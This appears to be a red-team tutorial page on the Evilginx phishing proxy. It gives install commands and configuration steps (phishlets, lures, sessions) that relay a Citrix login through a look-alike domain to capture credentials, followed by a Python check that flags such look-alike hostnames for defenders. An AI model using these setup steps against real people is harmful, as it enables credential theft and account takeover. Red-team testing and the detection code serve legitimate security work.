Evilginx

Evilginx is a relay framework that acts as a web proxy for Red Teams to phish credentials. The phished user interacts with the real website while Evilginx captures all data transmitted. Full ownership of a look-alike domain is required.

To use it, first download and install it on the phishing server:

sudo apt update

wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz

sudo tar -xvf go1.11.linux-amd64.tar.gz

sudo mv go /usr/local

sudo cp /usr/local/go/bin/go /usr/bin/

nano .profile

export GOPATH=$HOME/

export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

source .profile

#sudo systemctl stop systemd-resolved

#sudo apt-get install git make -y

go get -u github.com/kgretzky/evilginx2

cd $GOPATH/src/github.com/kgretzky/evilginx2

cd $GOPATH/bin

sudo ./evilginx2 -p $GOPATH/src/github.com/kgretzky/evilginx2/phishlets/

Then configure it. For example, for Citrix, where the legitimate site is target.citrix.com and the domain we own and use for the phishing is target.example.com:

config domain example.com

config ip {target.example.com IP address}

phishlets hostname citrix example.com

phishlets enable citrix

lures create citrix

lures edit 0 redirect_url https://example.com

lures get-url 0

sessions
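
From the defender's side, the setup above leaves one observable trait: the legitimate host prefix (target) is served from a different registrable domain. The following Python check is an added example, not part of the original page or of Evilginx; it flags such hostnames in a list of URLs. The function names, the generic-label list and the sample URLs are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# Hosts to protect; target.citrix.com is the legitimate host in the text above.
PROTECTED_HOSTS = ["target.citrix.com"]
# Assumed list of subdomain labels too common to count as a signal alone.
GENERIC_LABELS = {"www", "login", "mail", "portal"}

def split_host(host):
    """Return (subdomain labels, registrable domain).

    Assumption: the registrable domain is the last two labels. Production
    code should consult the Public Suffix List instead (think of .co.uk).
    """
    labels = host.lower().rstrip(".").split(".")
    return labels[:-2], ".".join(labels[-2:])

def classify(url):
    """Return 'legitimate', 'lookalike' or 'unrelated' for one URL."""
    host = urlsplit(url).hostname or ""
    sub, domain = split_host(host)
    verdict = "unrelated"
    for protected in PROTECTED_HOSTS:
        p_sub, p_domain = split_host(protected)
        brand = p_domain.split(".")[0]
        if domain == p_domain:
            return "legitimate"
        # Same host prefix served from a different registrable domain.
        mirrored = bool(p_sub) and sub == p_sub and not (set(p_sub) <= GENERIC_LABELS)
        # Brand name moved into the subdomain or into a hyphenated domain name.
        branded = brand in sub or brand in domain.split(".")[0].split("-")
        if mirrored or branded:
            verdict = "lookalike"
    return verdict

def flag_lookalikes(urls):
    """Return only the URLs whose host imitates a protected host."""
    return [u for u in urls if classify(u) == "lookalike"]

# Constructed sample URLs, as they might appear in proxy or mail-gateway logs.
SAMPLE_URLS = [
    "https://target.citrix.com/login",
    "https://target.example.com/AbCdEfGh",
    "https://target.citrix.com.example.net/login",
    "https://www.example.org/news",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"{classify(url):10}  {url}")
```
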
